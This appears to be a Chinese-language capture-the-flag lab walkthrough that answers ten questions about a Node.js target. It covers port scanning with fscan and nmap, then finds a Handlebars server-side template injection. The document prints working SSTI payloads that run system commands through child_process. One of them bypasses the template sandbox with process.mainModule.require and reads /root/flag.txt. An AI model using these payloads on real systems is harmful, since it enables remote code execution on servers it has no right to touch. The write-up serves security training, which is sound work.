[1.What TCP ports does nmap identify as open? Answer with a list of ports seperated by commas with no spaces, from low to high.](#1.What TCP ports does nmap identify as open? Answer with a list of ports seperated by commas with no spaces, from low to high.)
[2.What software is running the service listening on the http/web port identified in the first question?](#2.What software is running the service listening on the http/web port identified in the first question?)
[3.What is the name of the Web Framework according to Wappalyzer?](#3.What is the name of the Web Framework according to Wappalyzer?)
[4.What is the name of the vulnerability we test for by submitting {{7*7}}?](#4.What is the name of the vulnerability we test for by submitting {{7*7}}?)
[5.What is the templating engine being used within Node.JS?](#5.What is the templating engine being used within Node.JS?)
[6.What is the name of the BurpSuite tab used to encode text?](#6.What is the name of the BurpSuite tab used to encode text?)
[7.In order to send special characters in our payload in an HTTP request, we'll encode the payload. What type of encoding do we use?](#7.In order to send special characters in our payload in an HTTP request, we'll encode the payload. What type of encoding do we use?)
[8.When we use a payload from HackTricks to try to run system commands, we get an error back. What is "not defined" in the response error?](#8.When we use a payload from HackTricks to try to run system commands, we get an error back. What is "not defined" in the response error?)
[9.What variable is traditionally the name of the top-level scope in the browser context, but not in Node.JS?](#9.What variable is traditionally the name of the top-level scope in the browser context, but not in Node.JS?)
[10.By exploiting this vulnerability, we get command execution as the user that the webserver is running as. What is the name of that user?](#10.By exploiting this vulnerability, we get command execution as the user that the webserver is running as. What is the name of that user?)
1.What TCP ports does nmap identify as open? Answer with a list of ports seperated by commas with no spaces, from low to high.
fscan -nopoc -nobr -np -no -h {TARGET_IP}
由fscan扫描结果可见,靶机开启了:22,80 共2个端口
2.What software is running the service listening on the http/web port identified in the first question?
使用nmap 对靶机开放的80端口进行服务信息扫描:
nmap -sV -p 80 {TARGET_IP}
由nmap 扫描结果可见,VERSION 栏目下的服务信息:Node.js
3.What is the name of the Web Framework according to Wappalyzer?
4.What is the name of the vulnerability we test for by submitting {{7*7}}?
这种漏洞名为:SSTI 即服务器端模板注入(Server Side Template Injection)
5.What is the templating engine being used within Node.JS?
6.What is the name of the BurpSuite tab used to encode text?
打开Kali自带的BurpSuite 可见用于编解码的选项卡:Decoder
7.In order to send special characters in our payload in an HTTP request, we'll encode the payload. What type of encoding do we use?
{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.push (lookup string.sub "constructor")}}
{{#with string.split as |codelist|}}
{{this.push "return require('child_process').exec('whoami');"}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
8.When we use a payload from HackTricks to try to run system commands, we get an error back. What is "not defined" in the response error?
直接点击Send发包,回显为:require is not defined
require 是 JavaScript 中的一个关键字,之所以会出现require is not defined,是因为它主要用于从其他模块或文件加载代码的关键字,但因为在模板引擎里require通常跑在sandbox里,这样就很有可能限制了reqiure加载模块
9.What variable is traditionally the name of the top-level scope in the browser context, but not in Node.JS?
接下来尝试使用全局对象process 中的mainMoudle 主模块,再调用其中的require 创建一个子进程执行外部命令。通过**.execSync()**方法,同步外部命令,尝试绕过sandbox限制
{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.push (lookup string.sub "constructor")}}
{{#with string.split as |codelist|}}
{{this.push "return process.mainModule.require('child_process').execSync('whoami');"}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
10.By exploiting this vulnerability, we get command execution as the user that the webserver is running as. What is the name of that user?
process.mainModule.require('child_process').execSync('cat /root/flag.txt');"}}